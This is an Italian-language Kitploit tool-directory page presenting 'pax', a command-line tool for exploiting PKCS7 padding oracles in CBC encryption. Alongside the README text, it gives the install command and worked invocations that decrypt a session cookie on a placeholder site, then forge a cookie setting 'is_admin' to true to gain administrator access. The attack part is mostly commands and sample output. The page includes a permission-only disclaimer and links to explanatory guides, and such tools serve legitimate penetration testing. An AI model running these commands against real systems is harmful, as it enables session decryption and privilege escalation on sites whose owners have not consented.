Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
pax — :skull: :unlock: Strumento CLI per attacchi oracle di padding PKCS7 | Kitploit
Strumenti/GitHubGitHub/liamg/pax
ExploitSfruttamento di Applicazioni WebCrittografiaPenetration Testing
GitHubliamg/pax

pax

💀 🔓 Strumento CLI per attacchi oracle di padding PKCS7

Vedi Repository
142175 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

pax

Travis Build Status GoReportCard

Sfrutta gli oracoli di padding per divertimento e profitto!

Pax (PAdding oracle eXploiter) è uno strumento per sfruttare gli oracoli di padding allo scopo di:

  1. Ottenere il testo in chiaro per un dato blocco di dati crittografati con CBC.
  2. Ottenere byte crittografati per un dato testo in chiaro, utilizzando l'algoritmo di crittografia sconosciuto usato dall'oracolo.

Può essere utilizzato per divulgare informazioni di sessione crittografate, e spesso per bypassare l'autenticazione, elevare i privilegi ed eseguire codice da remoto crittografando testo in chiaro personalizzato e riscrivendolo sul server.

Come sempre, questo strumento dovrebbe essere usato solo su sistemi di tua proprietà e/o per i quali hai il permesso di sondare!

Installazione

Scarica dalle release, o installa con Go:

root@kitploit:~
go get -u github.com/liamg/pax/cmd/pax

Esempio di utilizzo

Se trovi un presunto oracolo, in cui i dati crittografati sono memorizzati all'interno di un cookie chiamato SESS, puoi usare quanto segue:

root@kitploit:~
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

Questo dovrebbe darti del testo in chiaro, magari qualcosa come:

root@kitploit:~
 {"user_id": 456, "is_admin": false}

Sembra che tu possa elevare i tuoi privilegi qui!

Puoi provare a farlo generando prima i tuoi dati crittografati che l'oracolo decritterà in un testo in chiaro furbo:

root@kitploit:~
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

Questo produrrà un altro insieme di dati crittografati codificati in base64, magari qualcosa come:

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Ora puoi aprire il browser e impostare il valore del cookie SESS al valore sopra. Caricando la pagina originale dell'oracolo, dovresti vedere che sei stato elevato al livello di amministratore.

Come funziona?

Le seguenti sono ottime guide su come funziona questo attacco:

  • https://robertheaton.com/2013/07/29/padding-oracle-attack/
  • https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth
Scarica lo strumento